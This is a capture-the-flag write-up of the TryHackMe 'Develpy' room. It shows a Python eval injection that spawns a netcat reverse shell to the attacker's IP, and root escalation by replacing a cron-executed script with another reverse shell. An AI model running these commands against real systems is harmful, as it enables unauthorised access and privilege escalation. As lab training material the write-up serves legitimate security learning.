Develpy — TryHackMe — WriteUp

TonyRahmos
3 min readDec 10, 2020

--

Hello. I’m Rahmos. Here is my Develpy — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

nmap

So there’re 2 ports opened: 22(SSH) and 10000(HTTP). Let’s first access the website at port 10000:

website

It’s an exception of Python code. Which means, it’s not a html page, but just python script. So let’s use nc to catch the request and input some information for the code:

nc <ip> 10000

nc

As you can see, now I can input “number of exploits”. Let’s try “1”:

Ok so what the code does is that it will ping tryhackme.com for n times, based on the input. Let’s try command injection. First, start a listener on your machine:

nc -lvnp 4444

Then, I will input this line of code to spawn reverse shell.

__import__(‘os’).system(‘nc -e /bin/bash <your-VPN-ip> 4444’)

And the code has been executed! I’ve got the shell:

reverse shell

Spawn a tty shell using Python:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

ls to view files and I’ve got the first user flag:

user flag

Next, I’ll find a way to own root. The image “credential.png” looks suspicious. Let’s transfer it to my machine.

credential.png

This image is “npiet” image, which will store hidden data. You can use this link to extract hidden data. After extracted, I’ve got password of user king:

king’s password

Now let’s sudo -l to see if I can run sudo as king:

sudo -l

Well I can’t. Let’s find another way. There’re 2 scripts: root.sh and run.sh inside king’s home:

I cannot chmod +x root.sh, but I can with run.sh:

Let’s see the cronjob:

cat /etc/crontab

Ok so each min root will execute “root.sh” inside king’s home folder. King doesn’t have permission to modify this root.sh, but king can delete it (because it’s in king’s home):

remove root.sh

Now, I’ll create a new “root.sh”, but inside, I will spawn a reverse shell:

modify root.sh

Now start a listener at port 5555:

nc -lvnp 5555

Wait 1 min and I’ve got the shell as root!

root shell

Get the final flag:

root.txt

The end.

HAPPY HACKING

--

--